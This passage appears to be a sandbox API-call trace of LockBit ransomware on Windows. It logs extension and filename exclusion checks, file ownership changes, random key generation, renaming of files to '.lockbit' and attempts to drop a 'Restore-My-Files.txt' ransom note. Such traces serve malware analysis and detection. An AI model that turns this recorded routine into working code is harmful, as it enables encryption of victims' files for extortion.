(lpString1=".db-shm", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0096.158] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0096.158] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0096.158] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0096.158] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0096.158] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0096.158] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0096.158] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0096.158] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0096.158] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0096.158] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0096.158] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0096.158] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0096.158] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0096.158] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png.lockbit") returned 95 [0096.158] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.159] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0096.160] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0096.160] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.161] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0096.162] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0096.162] RtlFreeAnsiString (AnsiString="\\") [0096.162] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13e0) returned 0x0 [0096.162] malloc (_Size=0x200) returned 0x77d800 [0096.163] NtQueryInformationToken (in: TokenHandle=0x13e0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0096.163] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.163] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.163] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.163] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.164] CloseHandle (hObject=0x13e0) returned 1 [0096.164] free (_Block=0x77d800) [0096.164] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e0 [0096.164] CreateIoCompletionPort (FileHandle=0x13e0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0096.164] malloc (_Size=0x40068) returned 0x3ef0008 [0096.164] GetFileSizeEx (in: hFile=0x13e0, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=5025) returned 1 [0096.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0096.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.168] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0096.168] ReadFile (in: hFile=0x13e0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0096.175] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0096.175] malloc (_Size=0xd4) returned 0x77d800 [0096.175] NtSetInformationFile (FileHandle=0x13e0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd4, FileInformationClass=0xa) returned 0x0 [0096.176] free (_Block=0x77d800) [0096.176] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0096.176] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0096.176] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.176] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0096.176] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0096.176] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0096.176] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0096.176] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0096.176] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0096.177] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0096.177] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0096.177] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0096.177] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0096.177] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0096.177] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0096.178] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0096.178] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0096.178] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0096.178] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0096.178] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0096.178] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0096.178] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0096.178] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0096.178] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0096.178] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0096.178] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0096.178] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0096.178] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0096.178] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0096.179] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png") returned=".png" [0096.179] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0096.179] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0096.179] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0096.179] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0096.179] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0096.179] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0096.180] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0096.180] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0096.180] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0096.180] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0096.180] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0096.180] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png.lockbit") returned 101 [0096.180] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.181] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0096.182] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0096.182] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.183] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0096.184] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0096.185] RtlFreeAnsiString (AnsiString="\\") [0096.185] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1194) returned 0x0 [0096.185] malloc (_Size=0x200) returned 0x77d800 [0096.185] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0096.185] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.185] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.185] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.185] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.186] CloseHandle (hObject=0x1194) returned 1 [0096.186] free (_Block=0x77d800) [0096.186] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0096.186] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0096.186] malloc (_Size=0x40068) returned 0x3d70048 [0096.188] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3118) returned 1 [0096.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0096.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0096.192] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0096.204] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0096.204] malloc (_Size=0xe0) returned 0x77d800 [0096.204] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xe0, FileInformationClass=0xa) returned 0x0 [0096.205] free (_Block=0x77d800) [0096.205] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0096.205] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0096.205] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.205] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0096.205] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0096.205] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0096.205] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0096.205] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0096.206] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0096.206] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0096.206] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0096.206] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0096.206] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0096.207] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0096.207] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0096.207] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0096.207] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0096.207] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0096.207] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0096.207] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0096.207] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0096.207] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0096.207] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0096.207] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0096.207] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0096.207] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0096.207] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0096.208] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0096.208] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png") returned=".png" [0096.208] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0096.208] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0096.208] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0096.208] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0096.208] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0096.208] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0096.208] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0096.208] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0096.209] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0096.209] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0096.209] lstrcmpiW 